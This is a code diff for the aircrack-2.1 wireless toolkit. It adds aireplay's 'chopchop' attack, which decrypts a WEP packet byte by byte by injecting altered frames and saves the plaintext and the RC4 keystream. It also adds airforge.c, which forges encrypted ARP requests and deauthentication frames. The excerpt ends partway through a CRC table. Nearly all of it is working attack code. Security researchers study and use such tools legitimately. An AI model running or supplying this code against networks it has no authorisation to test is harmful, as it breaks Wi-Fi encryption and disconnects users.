++ {
++ printf( "exiting.\n\n" );
++ return( 0 );
++ }
++
++ /* wait for the next timer interrupt */
++
++ if( read( fd_rtc, &n, sizeof( n ) ) < 0 )
++ {
++ perror( "\nread(/dev/rtc)" );
++ return( 1 );
++ }
++
++ ticks[0]++;
++ ticks[1]++;
++ ticks[2]++;
++
++ if( ticks[1] == 400 )
++ {
++ ticks[1] = 0;
++ printf( "\rSent %ld packets...\33[K", nb_pkt_sent );
++ fflush( stdout );
++ }
++
++ if( ( ticks[2] * opt.nbpps ) / 4096 < 1 )
++ continue;
++
++ ticks[2] = 0;
++
++ if( send_frame( fd_out, h80211, caplen ) != 0 )
++ {
++ if( errno != EAGAIN )
++ {
++ perror( "write" );
++ return( 1 );
++ }
++ }
++ else
++ nb_pkt_sent++;
+ }
+
+- printf( "\r\33[1KRead %ld packets, got %ld "
+- "potential ARP requests.\n", cnt1, cnt2 );
++ return( 0 );
++
++ /* chopchop operation mode: truncate and decrypt the packet */
++ /* we assume the plaintext starts with AA AA 03 00 00 00 */
++
++do_chopchop:
++
++ /* backup the packet */
+
+- if( cnt2 == 0 )
++ if( ( savebuf = (unsigned char *) malloc( pkh.caplen ) ) == NULL )
++ {
++ perror( "malloc" );
+ return( 1 );
++ }
+
+- /* now loop sending the ARP packets we've got */
++ memcpy( savebuf, h80211, pkh.caplen );
+
+- cnt1 = 0;
++ /* setup the chopping buffer */
+
+- while( cnt2 )
++ n = pkh.caplen - z + 24;
++
++ if( ( chopped = (unsigned char *) malloc( n ) ) == NULL )
+ {
+- for( i = 0; i < cnt2; i++ )
++ perror( "malloc" );
++ return( 1 );
++ }
++
++ memset( chopped, 0, n );
++
++ data_start = z + 4;
++ data_end = pkh.caplen;
++
++ chopped[0] = 0x08; /* normal data frame */
++ chopped[1] = 0x41; /* WEP = 1, ToDS = 1 */
++
++ if( opt.r_fc_0 != -1 ) chopped[0] = opt.r_fc_0;
++ if( opt.r_fc_1 != -1 ) chopped[1] = opt.r_fc_1;
++
++ memcpy( chopped + 4, h80211 + i_bssid, 6 ); /* copy the BSSID */
++ memcpy( chopped + 24, h80211 + z, 4 ); /* copy the WEP IV */
++
++ /* setup the xor mask to hide the original data */
++
++ crc_mask = 0;
++
++ for( i = data_start; i < data_end - 4; i++ )
++ {
++ switch( i - data_start )
+ {
+- if( do_exit ) cnt2 = 0;
++ case 0: chopped[i] = 0xAA ^ 0xE0; break;
++ case 1: chopped[i] = 0xAA ^ 0xE0; break;
++ case 2: chopped[i] = 0x03 ^ 0x03; break;
++ default: chopped[i] = 0x55 ^ ( i & 0xFF ); break;
++ }
++
++ crc_mask = crc_tbl[crc_mask & 0xFF]
++ ^ ( crc_mask >> 8 )
++ ^ ( chopped[i] << 24 );
++ }
++
++ for( i = 0; i < 4; i++ )
++ crc_mask = crc_tbl[crc_mask & 0xFF]
++ ^ ( crc_mask >> 8 );
++
++ chopped[data_end - 4] = crc_mask; crc_mask >>= 8;
++ chopped[data_end - 3] = crc_mask; crc_mask >>= 8;
++ chopped[data_end - 2] = crc_mask; crc_mask >>= 8;
++ chopped[data_end - 1] = crc_mask; crc_mask >>= 8;
++
++ for( i = data_start; i < data_end; i++ )
++ chopped[i] ^= savebuf[i];
++
++ data_start += 6; /* skip the SNAP header */
++
++ /* if the replay source mac is unspecified, forge one */
++
++ if( memcmp( opt.r_smac, NULL_MAC, 6 ) == 0 )
++ {
++ is_deauth_mode = 1;
++
++ opt.r_smac[0] = 0x00;
++ opt.r_smac[1] = rand() & 0x3E;
++ opt.r_smac[2] = rand() & 0xFF;
++ opt.r_smac[3] = rand() & 0xFF;
++ opt.r_smac[4] = rand() & 0xFF;
++
++ memcpy( opt.r_dmac, "\xFF\xFF\xFF\xFF\xFF\xFF", 6 );
++ }
++ else
++ {
++ is_deauth_mode = 0;
+
+- if( time( NULL ) - tm_prev >= 1 )
++ opt.r_dmac[0] = 0xFF;
++ opt.r_dmac[1] = rand() & 0xFE;
++ opt.r_dmac[2] = rand() & 0xFF;
++ opt.r_dmac[3] = rand() & 0xFF;
++ opt.r_dmac[4] = rand() & 0xFF;
++ }
++
++ /* let's go chopping */
++
++ memset( ticks, 0, sizeof( ticks ) );
++
++ nb_pkt_read = 0;
++ nb_pkt_sent = 0;
++
++ tt = time( NULL );
++
++ guess = 256;
++
++ alarm( 15 );
++
++ signal( SIGALRM, sighandler );
++
++ if( fcntl( fd_in, F_SETFL, O_NONBLOCK ) < 0 )
++ {
++ perror( "fcntl(O_NONBLOCK)" );
++ return( 1 );
++ }
++
++ while( data_end > data_start )
++ {
++ if( do_exit == 1 )
++ {
++ printf( "exiting.\n\n" );
++ return( 1 );
++ }
++
++ if( do_exit == 2 )
++ {
++ printf( "\n\nThe chopchop attack appears to have failed. "
++ "Possible reasons:\n\n * Something is wrong with "
++ "the driver or the wireless card itself.\n * You "
++ "are too far from the AP. Get closer or reduce the "
++ "send rate." );
++
++ if( is_deauth_mode )
++ printf( "\n * The AP isn't vulnerable when operating in "
++ "non-authenticated mode.\n Run aireplay in "
++ "authenticated mode instead (-h option).\n\n" );
++ else
++ printf( "\n * The client MAC you have specified "
++ "is not currently authenticated."
++ "\n * The AP isn't vulnerable when operating in "
++ "authenticated mode.\n Run aireplay in non-"
++ "authenticated mode instead (no -h option).\n\n" );
++ return( 1 );
++ }
++
++ /* wait for the next timer interrupt */
++
++ if( read( fd_rtc, &n, sizeof( n ) ) < 0 )
++ {
++ perror( "read(/dev/rtc)" );
++ return( 1 );
++ }
++
++ ticks[0]++; /* ticks since we entered the while loop */
++ ticks[1]++; /* ticks since the last status line update */
++ ticks[2]++; /* ticks since the last frame was sent */
++ ticks[3]++; /* ticks since started chopping current byte */
++
++ /* update the status line */
++
++ if( ticks[1] == 400 )
++ {
++ ticks[1] = 0;
++ printf( "\rSent %3ld packets, current guess: %02X...\33[K",
++ nb_pkt_sent, guess );
++ fflush( stdout );
++ }
++
++ if( data_end == 40 && ticks[3] > 8 * ( ticks[0] - ticks[3] ) /
++ (int) ( pkh.caplen - ( data_end - 1 ) ) )
++ {
++ printf( "\n\nThe AP appears to drop packets shorter "
++ "than 40 bytes.\n" );
++
++ h80211 = buffer;
++
++ z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
++
++ if( ( chopped[data_end + 0] ^ savebuf[data_end + 0] ) == 0x06 &&
++ ( chopped[data_end + 1] ^ savebuf[data_end + 1] ) == 0x04 &&
++ ( chopped[data_end + 2] ^ savebuf[data_end + 2] ) == 0x00 )
+ {
+- tm_prev = time( NULL );
+- printf( "\r\33[1KSent %ld packets\r", cnt1 );
+- fflush( stdout );
++ printf( "Enabling standard workaround: "
++ "ARP header re-creation.\n" );
++
++ chopped[z + 10] = savebuf[z + 10] ^ 0x08;
++ chopped[z + 11] = savebuf[z + 11] ^ 0x06;
++ chopped[z + 12] = savebuf[z + 12] ^ 0x00;
++ chopped[z + 13] = savebuf[z + 13] ^ 0x01;
++ chopped[z + 14] = savebuf[z + 14] ^ 0x08;
++ chopped[z + 15] = savebuf[z + 15] ^ 0x00;
+ }
++ else
++ {
++ printf( "Enabling standard workaround: "
++ " IP header re-creation.\n" );
++
++ n = pkh.caplen - ( z + 16 );
+
+- n = arp_packets[i].length;
++ chopped[z + 4] = savebuf[z + 4] ^ 0xAA;
++ chopped[z + 5] = savebuf[z + 5] ^ 0xAA;
++ chopped[z + 6] = savebuf[z + 6] ^ 0x03;
++ chopped[z + 7] = savebuf[z + 7] ^ 0x00;
++ chopped[z + 8] = savebuf[z + 8] ^ 0x00;
++ chopped[z + 9] = savebuf[z + 9] ^ 0x00;
++ chopped[z + 10] = savebuf[z + 10] ^ 0x08;
++ chopped[z + 11] = savebuf[z + 11] ^ 0x00;
++ chopped[z + 14] = savebuf[z + 14] ^ ( n >> 8 );
++ chopped[z + 15] = savebuf[z + 15] ^ ( n & 0xFF );
++
++ memcpy( buffer, savebuf, pkh.caplen );
++
++ for( i = z + 4; i < (int) pkh.caplen; i++ )
++ h80211[i - 4] = h80211[i] ^ chopped[i];
++
++ /* sometimes the header length or the tos field vary */
++
++ for( i = 0; i < 16; i++ )
++ {
++ h80211[z + 8] = 0x40 + i;
++ chopped[z + 12] = savebuf[z + 12] ^ ( 0x40 + i );
++
++ for( j = 0; j < 256; j++ )
++ {
++ h80211[z + 9] = j;
++ chopped[z + 13] = savebuf[z + 13] ^ j;
++
++ if( check_crc_buf( h80211 + z, pkh.caplen - z - 8 ) )
++ goto have_crc_match;
++ }
++ }
+
+- if( write( raw_sock, arp_packets[i].data, n ) != n )
++ printf( "This doesn't look like an IP packet, "
++ "try another one.\n" );
++
++ }
++
++ have_crc_match:
++ break;
++ }
++
++ if( ( ticks[2] * opt.nbpps ) / 4096 > 0 )
++ {
++ /* send one modified frame */
++
++ ticks[2] = 0;
++
++ memcpy( buffer, chopped, data_end - 1 );
++
++ /* note: guess 256 is special, it tests if the *
++ * AP properly drops frames with an invalid ICV *
++ * so this guess always has its bit 8 set to 0 */
++
++ if( is_deauth_mode )
+ {
+- perror( "write" );
++ opt.r_smac[1] |= ( guess < 256 );
++ opt.r_smac[5] = guess & 0xFF;
++ }
++ else
++ {
++ opt.r_dmac[1] |= ( guess < 256 );
++ opt.r_dmac[5] = guess & 0xFF;
++ }
++
++ memcpy( buffer + 10, opt.r_smac, 6 );
++ memcpy( buffer + 16, opt.r_dmac, 6 );
++
++ if( guess < 256 )
++ {
++ buffer[data_end - 2] ^= crc_chop_tbl[guess][3];
++ buffer[data_end - 3] ^= crc_chop_tbl[guess][2];
++ buffer[data_end - 4] ^= crc_chop_tbl[guess][1];
++ buffer[data_end - 5] ^= crc_chop_tbl[guess][0];
++ }
++
++ if( send_frame( fd_out, buffer, data_end -1 ) != 0 )
++ {
++ if( errno != EAGAIN )
++ {
++ perror( "write" );
++ return( 1 );
++ }
++ }
++ else
++ {
++ nb_pkt_sent++;
++ if( ++guess > 256 ) guess = 0;
++ }
++ }
++
++ /* watch for a response from the AP */
++
++ memset( buffer, 0, 2048 );
++
++ if( ( caplen = read( fd_in, buffer,
++ sizeof( buffer ) ) ) < 0 )
++ {
++ if( errno == EAGAIN ) continue;
++ perror( "read" );
++ return( 1 );
++ }
++
++ /* if device is an atheros, remove the FCS */
++
++ if( memcmp( argv[argc - 1], "ath", 3 ) == 0 )
++ caplen -= 4;
++
++ nb_pkt_read++;
++
++ /* skip the prism header if present */
++
++ h80211 = buffer;
++
++ if( arptype_in == ARPHRD_IEEE80211_PRISM )
++ {
++ n = *(int *)( buffer + 4 );
++
++ if( n < 8 || n >= (int) caplen )
++ continue;
++
++ h80211 += n;
++ caplen -= n;
++ }
++
++ /* check if it's a deauthentication packet */
++
++ if( h80211[0] == 0xC0 )
++ {
++ if( memcmp( h80211 + 4, opt.r_smac, 6 ) == 0 &&
++ ! is_deauth_mode )
++ {
++ printf( "\rThe client's source MAC you have specified "
++ "does not appear to\nbe authenticated (got a "
++ "deauthentication packet from the AP).\n\n" );
++ return( 1 );
++ }
++
++ if( h80211[4] != opt.r_smac[0] ) continue;
++ if( h80211[6] != opt.r_smac[2] ) continue;
++ if( h80211[7] != opt.r_smac[3] ) continue;
++ if( h80211[8] != opt.r_smac[4] ) continue;
++
++ if( ( h80211[5] & 0xFE ) !=
++ ( opt.r_smac[1] & 0xFE ) ) continue;
++
++ if( ! ( h80211[5] & 1 ) )
++ {
++ printf( "\rThe Access Point does not appear to properly "
++ "discard frames with an\ninvalid ICV - try running "
++ "aireplay in authenticated mode (-h) instead.\n\n" );
++ return( 1 );
++ }
++ }
++ else
++ {
++ if( is_deauth_mode )
++ continue;
++
++ /* check if it's a WEP data packet */
++
++ if( ( h80211[0] & 0x0C ) != 8 ) continue;
++ if( ( h80211[0] & 0xF0 ) != 0 ) continue;
++ if( ( h80211[1] & 0x03 ) != 2 ) continue;
++ if( ( h80211[1] & 0x40 ) == 0 ) continue;
++
++ /* check the extended IV (TKIP) flag */
++
++ z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
++
++ if( ( h80211[z + 3] & 0x20 ) != 0 ) continue;
++
++ /* check the destination address */
++
++ if( h80211[4] != opt.r_dmac[0] ) continue;
++ if( h80211[6] != opt.r_dmac[2] ) continue;
++ if( h80211[7] != opt.r_dmac[3] ) continue;
++ if( h80211[8] != opt.r_dmac[4] ) continue;
++
++ if( ( h80211[5] & 0xFE ) !=
++ ( opt.r_dmac[1] & 0xFE ) ) continue;
++
++ if( ! ( h80211[5] & 1 ) )
++ {
++ printf( "\nThe Access Point does not appear to properly "
++ "discard frames with an\ninvalid ICV - try running "
++ "aireplay in non-authenticated mode instead.\n\n" );
+ return( 1 );
+ }
++ }
++
++ /* we have a winner */
++
++ guess = h80211[9];
++
++ chopped[data_end - 1] ^= guess;
++ chopped[data_end - 2] ^= crc_chop_tbl[guess][3];
++ chopped[data_end - 3] ^= crc_chop_tbl[guess][2];
++ chopped[data_end - 4] ^= crc_chop_tbl[guess][1];
++ chopped[data_end - 5] ^= crc_chop_tbl[guess][0];
++
++ n = pkh.caplen - data_start;
+
+- cnt1++;
++ printf( "\rOffset %4d (%2d%% done) | xor = %02X | pt = %02X | "
++ "%4ld frames written in %5ldms\n", data_end - 1,
++ 100 * ( pkh.caplen - data_end ) / n,
++ chopped[data_end - 1],
++ chopped[data_end - 1] ^ savebuf[data_end - 1],
++ nb_pkt_sent, ( 1000 * ticks[3] ) / 4096 );
++
++ nb_pkt_sent = ticks[3] = 0;
++
++ guess = 256;
++
++ if( is_deauth_mode )
++ {
++ opt.r_smac[1] = rand() & 0x3E;
++ opt.r_smac[2] = rand() & 0xFF;
++ opt.r_smac[3] = rand() & 0xFF;
++ opt.r_smac[4] = rand() & 0xFF;
+ }
++ else
++ {
++ opt.r_dmac[1] = rand() & 0xFE;
++ opt.r_dmac[2] = rand() & 0xFF;
++ opt.r_dmac[3] = rand() & 0xFF;
++ opt.r_dmac[4] = rand() & 0xFF;
++ }
++
++ data_end--;
++
++ alarm( 0 );
+ }
+
+- printf( "\r\33[1KSent %ld packets.\n", cnt1 );
++ /* reveal the plaintext (chopped contains the prga) */
++
++ h80211 = savebuf;
++
++ z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
++
++ chopped[z + 4] = savebuf[z + 4] ^ 0xAA;
++ chopped[z + 5] = savebuf[z + 5] ^ 0xAA;
++ chopped[z + 6] = savebuf[z + 6] ^ 0x03;
++ chopped[z + 7] = savebuf[z + 7] ^ 0x00;
++ chopped[z + 8] = savebuf[z + 8] ^ 0x00;
++ chopped[z + 9] = savebuf[z + 9] ^ 0x00;
++
++ for( i = z + 4; i < (int) pkh.caplen; i++ )
++ h80211[i - 4] = h80211[i] ^ chopped[i];
++
++ if( ! check_crc_buf( h80211 + z, pkh.caplen - z - 8 ) )
++ printf( "\nWarning: ICV checksum verification FAILED!\n" );
++
++ pkh.caplen -= 4 + 4; /* remove the WEP IV & CRC (ICV) */
++ pkh.len -= 4 + 4;
++
++ h80211[1] &= 0xBF; /* remove the WEP bit, too */
++
++ /* save the decrypted packet */
++
++ sprintf( tmp_str, "replay_dec-%02d%02d%02d-%02d%02d%02d.cap",
++ lt->tm_year - 100, 1 + lt->tm_mon, lt->tm_mday,
++ lt->tm_hour, lt->tm_min, lt->tm_sec );
++
++ printf( "\nSaving plaintext in %s\n", tmp_str );
++
++ if( ( f_cap_out = fopen( tmp_str, "wb+" ) ) == NULL )
++ {
++ perror( "fopen(output pcap,wb+)" );
++ return( 1 );
++ }
++
++ n = sizeof( struct pcap_file_header );
++
++ if( fwrite( &pfh, 1, n, f_cap_out ) != (size_t) n )
++ {
++ perror( "fwrite(pcap file header)" );
++ return( 1 );
++ }
++
++ n = sizeof( pkh );
++
++ if( fwrite( &pkh, 1, n, f_cap_out ) != (size_t) n )
++ {
++ perror( "fwrite(packet header)" );
++ return( 1 );
++ }
++
++ n = pkh.caplen;
++
++ if( fwrite( h80211, 1, n, f_cap_out ) != (size_t) n )
++ {
++ perror( "fwrite(packet data)" );
++ return( 1 );
++ }
++
++ /* save the RC4 xor mask (prga) */
++
++ sprintf( tmp_str, "replay_dec-%02d%02d%02d-%02d%02d%02d.xor",
++ lt->tm_year - 100, 1 + lt->tm_mon, lt->tm_mday,
++ lt->tm_hour, lt->tm_min, lt->tm_sec );
++
++ printf( "Saving keystream in %s\n", tmp_str );
++
++ if( ( f_cap_out = fopen( tmp_str, "wb+" ) ) == NULL )
++ {
++ perror( "fopen(output prga,wb+)" );
++ return( 1 );
++ }
++
++ n = pkh.caplen + 8 - z;
++
++ if( fwrite( chopped + z, 1, n, f_cap_out ) != (size_t) n )
++ {
++ perror( "fwrite(prga data)" );
++ return( 1 );
++ }
++
++ printf( "\nCompleted in %lds (%0.2f bytes/s)\n\n",
++ time( NULL ) - tt,
++ (float) ( pkh.caplen - 6 - z ) /
++ (float) ( time( NULL ) - tt ) );
++
++ /* that's all, folks */
+
+ return( 0 );
+ }
+diff -urN aircrack-2.1.orig/airforge.c aircrack-2.1/airforge.c
+--- aircrack-2.1.orig/airforge.c 1970-01-01 01:00:00.000000000 +0100
++++ aircrack-2.1/airforge.c 2005-04-22 08:51:21.933064968 +0200
+@@ -0,0 +1,267 @@
++/*
++ * 802.11 ARP-request & deauthentication frame forgery
++ *
++ * Copyright (C) 2005 Christophe Devine
++ *
++ * This program is free software; you can redistribute it and/or modify
++ * it under the terms of the GNU General Public License as published by
++ * the Free Software Foundation; either version 2 of the License, or
++ * (at your option) any later version.
++ *
++ * This program is distributed in the hope that it will be useful,
++ * but WITHOUT ANY WARRANTY; without even the implied warranty of
++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
++ * GNU General Public License for more details.
++ *
++ * You should have received a copy of the GNU General Public License
++ * along with this program; if not, write to the Free Software
++ * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
++ */
++
++#include <arpa/inet.h>
++#include <string.h>
++#include <stdlib.h>
++#include <stdio.h>
++
++#include "pcap-aireplay.h"
++#include "crctable.h"
++
++#define ARP_REQ \
++ "\x08\x40\x02\x01\xBB\xBB\xBB\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xCC\xCC" \
++ "\xFF\xFF\xFF\xFF\xFF\xFF\x80\x01\x55\x55\x55\x55\xAA\xAA\x03\x00" \
++ "\x00\x00\x08\x06\x00\x01\x08\x00\x06\x04\x00\x01\xCC\xCC\xCC\xCC" \
++ "\xCC\xCC\x11\x11\x11\x11\x00\x00\x00\x00\x00\x00\x22\x22\x22\x22" \
++ "\x00\x00\x00\x00"
++
++#define DEAUTH_REQ \
++ "\xC0\x00\x02\x01\xCC\xCC\xCC\xCC\xCC\xCC\xBB\xBB\xBB\xBB\xBB\xBB" \
++ "\xBB\xBB\xBB\xBB\xBB\xBB\x00\x00\x07\x00"
++
++char usage[] =
++
++"\n"
++" airforge 2.2 - (C) 2005 Christophe Devine\n"
++"\n"
++" usage 1: arp-request forgery\n"
++"\n"
++" arpforge <prga file> <type> <bssid> <mac src>\n"
++" <ip src> <ip dst> <output filename>\n"
++"\n"
++" usage 2: deauthentication frame forgery\n"
++"\n"
++" arpforge <bssid> <dst mac> <output filename>\n"
++"\n";
++
++int getmac( char *s, unsigned char *mac )
++{
++ int i = 0, n;
++
++ while( sscanf( s, "%x", &n ) == 1 )
++ {
++ if( n < 0 || n > 255 )
++ return( 1 );
++
++ mac[i] = n;
++
++ if( ++i == 6 ) break;
++
++ if( ! ( s = strchr( s, ':' ) ) )
++ break;
++
++ s++;
++ }
++
++ return( i != 6 );
++}
++
++int main( int argc, char *argv[] )
++{
++ int n;
++ unsigned long int crc;
++ FILE *f_prga, *f_cap_out;
++
++ unsigned char h80211[128];
++ unsigned char bssid[6];
++ unsigned char saddr[6];
++ unsigned char daddr[6];
++ unsigned char ipsrc[4];
++ unsigned char ipdst[4];
++ unsigned char prga[44];
++
++ struct pcap_file_header pfh;
++ struct pcap_pkthdr pkh;
++ struct timeval tv;
++
++ if( argc == 4 )
++ goto forge_deauth;
++
++ if( argc != 8 )
++ {
++ printf( usage );
++ return( 1 );
++ }
++
++ if( ( f_prga = fopen( argv[1], "rb" ) ) == NULL )
++ {
++ perror( "fopen(input prga,rb)" );
++ return( 1 );
++ }
++
++ memcpy( h80211, ARP_REQ, pkh.caplen = 68 );
++
++ n = atoi( argv[2] );
++
++ if( n != 1 && n != 2 )
++ {
++ fprintf( stderr, "Invalid type: must be 1 "
++ "(ToDS) or 2 (FromDS).\n" );
++ return( 1 );
++ }
++
++ h80211[1] |= n;
++
++ if( getmac( argv[3], bssid ) != 0 )
++ {
++ fprintf( stderr, "Invalid BSSID.\n" );
++ return( 1 );
++ }
++
++ if( getmac( argv[4], saddr ) != 0 )
++ {
++ fprintf( stderr, "Invalid source MAC.\n" );
++ return( 1 );
++ }
++
++ memcpy( daddr, "\xFF\xFF\xFF\xFF\xFF\xFF", 6 );
++
++ if( ! inet_aton( argv[5], (struct in_addr *) ipsrc ) )
++ {
++ fprintf( stderr, "Invalid source IP.\n" );
++ return( 1 );
++ }
++
++ if( ! inet_aton( argv[6], (struct in_addr *) ipdst ) )
++ {
++ fprintf( stderr, "Invalid destination IP.\n" );
++ return( 1 );
++ }
++
++ if( n == 1 )
++ {
++ memcpy( h80211 + 4, bssid, 6 );
++ memcpy( h80211 + 10, saddr, 6 );
++ memcpy( h80211 + 16, daddr, 6 );
++ }
++
++ if( n == 2 )
++ {
++ memcpy( h80211 + 10, bssid, 6 );
++ memcpy( h80211 + 16, saddr, 6 );
++ memcpy( h80211 + 4, daddr, 6 );
++ }
++
++ memcpy( h80211 + 44, saddr, 6 );
++ memcpy( h80211 + 50, ipsrc, 4 );
++ memcpy( h80211 + 60, ipdst, 4 );
++
++ /* XXX: this source code lacks comments */
++
++ crc = 0xFFFFFFFF;
++
++ for( n = 28; n < 64; n++ )
++ crc = crc_tbl[(crc ^ h80211[n]) & 0xFF] ^ (crc >> 8);
++
++ crc = ~crc;
++
++ h80211[64] = (crc ) & 0xFF;
++ h80211[65] = (crc >> 8) & 0xFF;
++ h80211[66] = (crc >> 16) & 0xFF;
++ h80211[67] = (crc >> 24) & 0xFF;
++
++ if( fread( prga, 44, 1, f_prga ) != 1 )
++ {
++ fprintf( stderr, "fread(44 bytes) failed - prga too short ?\n" );
++ return( 1 );
++ }
++
++ memcpy( h80211 + 24, prga, 4 );
++
++ for( n = 28; n < 68; n++ )
++ h80211[n] ^= prga[n - 24];
++
++ n = 7;
++
++ goto write_packet;
++
++forge_deauth:
++
++ memcpy( h80211, DEAUTH_REQ, pkh.caplen = 26 );
++
++ if( getmac( argv[1], bssid ) != 0 )
++ {
++ fprintf( stderr, "Invalid BSSID.\n" );
++ return( 1 );
++ }
++
++ if( getmac( argv[2], daddr ) != 0 )
++ {
++ fprintf( stderr, "Invalid destination MAC.\n" );
++ return( 1 );
++ }
++
++ memcpy( h80211 + 4, daddr, 6 );
++ memcpy( h80211 + 10, bssid, 6 );
++ memcpy( h80211 + 16, bssid, 6 );
++
++ n = 3;
++
++write_packet:
++
++ if( ( f_cap_out = fopen( argv[n], "wb+" ) ) == NULL )
++ {
++ fprintf( stderr, "failed: fopen(%s,wb+)\n", argv[7] );
++ return( 1 );
++ }
++
++ pfh.magic = TCPDUMP_MAGIC;
++ pfh.version_major = PCAP_VERSION_MAJOR;
++ pfh.version_minor = PCAP_VERSION_MINOR;
++ pfh.thiszone = 0;
++ pfh.sigfigs = 0;
++ pfh.snaplen = 65535;
++ pfh.linktype = LINKTYPE_IEEE802_11;
++
++ n = sizeof( struct pcap_file_header );
++
++ if( fwrite( &pfh, 1, n, f_cap_out ) != (size_t) n )
++ {
++ fprintf( stderr, "failed: fwrite(pcap file header)\n" );
++ return( 1 );
++ }
++
++ gettimeofday( &tv, NULL );
++
++ pkh.tv_sec = tv.tv_sec;
++ pkh.tv_usec = tv.tv_usec;
++ pkh.len = pkh.caplen;
++
++ n = sizeof( pkh );
++
++ if( fwrite( &pkh, 1, n, f_cap_out ) != (size_t) n )
++ {
++ fprintf( stderr, "fwrite(packet header) failed\n" );
++ return( 1 );
++ }
++
++ n = pkh.caplen;
++
++ if( fwrite( h80211, 1, n, f_cap_out ) != (size_t) n )
++ {
++ fprintf( stderr, "fwrite(packet data) failed\n" );
++ return( 1 );
++ }
++
++ printf( "Done.\n" );
++
++ return( 0 );
++}
+diff -urN aircrack-2.1.orig/crctable.h aircrack-2.1/crctable.h
+--- aircrack-2.1.orig/crctable.h 1970-01-01 01:00:00.000000000 +0100
++++ aircrack-2.1/crctable.h 2005-04-22 08:51:21.934064816 +0200
+@@ -0,0 +1,108 @@
++#ifndef _CRCTABLE_H
++#define _CRCTABLE_H
++
++const unsigned long int crc_tbl[256] =
++{
++ 0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419, 0x706AF48F, 0xE963A535, 0x9E6495A3,
++ 0x0EDB8832, 0x79DCB8A4, 0xE0D5E91E, 0x97D2D988, 0x09B64C2B, 0x7EB17CBD, 0xE7B82D07, 0x90BF1D91,
++ 0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE, 0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7,
++ 0x136C9856, 0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9, 0xFA0F3D63, 0x8D080DF5,
++ 0x3B6E20C8, 0x4C69105E, 0xD56041E4, 0xA2677172, 0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B,
++ 0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940, 0x32D86CE3, 0x45DF5C75, 0xDCD60DCF, 0xABD13D59,
++ 0x26D930AC, 0x51DE003A, 0xC8D75180, 0xBFD06116, 0x21B4F4B5, 0x56B3C423, 0xCFBA9599, 0xB8BDA50F,
++ 0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924, 0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D,
++ 0x76DC4190, 0x01DB7106, 0x98D220BC, 0xEFD5102A, 0x71B18589, 0x06B6B51F, 0x9FBFE4A5, 0xE8B8D433,
++ 0x7807C9A2, 0x0F00F934, 0x9609A88E, 0xE10E9818, 0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01,
++ 0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E, 0x6C0695ED, 0x1B01A57B, 0x8208F4C1, 0xF50FC457,
++ 0x65B0D9C6, 0x12B7E950, 0x8BBEB8EA, 0xFCB9887C, 0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3, 0xFBD44C65,
++ 0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2, 0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB,
++ 0x4369E96A, 0x346ED9FC, 0xAD678846, 0xDA60B8D0, 0x44042D73, 0x33031DE5, 0xAA0A4C5F, 0xDD0D7CC9,
++ 0x5005713C, 0x270241AA, 0xBE0B1010, 0xC90C2086, 0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F,
++ 0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4, 0x59B33D17, 0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD,
++ 0xEDB88320, 0x9ABFB3B6, 0x03B6E20C, 0x74B1D29A, 0xEAD54739, 0x9DD277AF, 0x04DB2615, 0x73DC1683,
++ 0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8, 0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1,
++ 0xF00F9344, 0x8708A3D2, 0x1E01F268, 0x6906C2FE, 0xF762575D, 0x806567CB, 0x196C3671, 0x6E6B06E7,
++ 0xFED41B76, 0x89D32BE0, 0x10DA7A5A, 0x67DD4ACC, 0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5,
++ 0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252, 0xD1BB67F1, 0xA6BC5767, 0x3FB506DD, 0x48B2364B,
++ 0xD80D2BDA, 0xAF0A1B4C, 0x36034AF6, 0x41047A60, 0xDF60EFC3, 0xA867DF55, 0x316E8EEF, 0x4669BE79,
++ 0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236, 0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F,
++ 0xC5BA3BBE, 0xB2BD0B28, 0x2BB45A92, 0x5CB36A04, 0xC2D7FFA7, 0xB5D0CF31, 0x2CD99E8B, 0x5BDEAE1D,
++ 0x9B64C2B0, 0xEC63F226, 0x756AA39C, 0x026D930A, 0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713,
++ 0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38, 0x92D28E9B, 0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21,
++ 0x86D3D2D4, 0xF1D4E242, 0x68DDB3F8, 0x1FDA836E, 0x81BE16CD, 0xF6B9265B, 0x6FB077E1, 0x18B74777,
++ 0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C, 0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45,
++ 0xA00AE278, 0xD70DD2EE, 0x4E048354, 0x3903B3C2, 0xA7672661, 0xD06016F7, 0x4969474D, 0x3E6E77DB,
++ 0xAED16A4A, 0xD9D65ADC, 0x40DF0B66, 0x37D83BF0, 0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9,
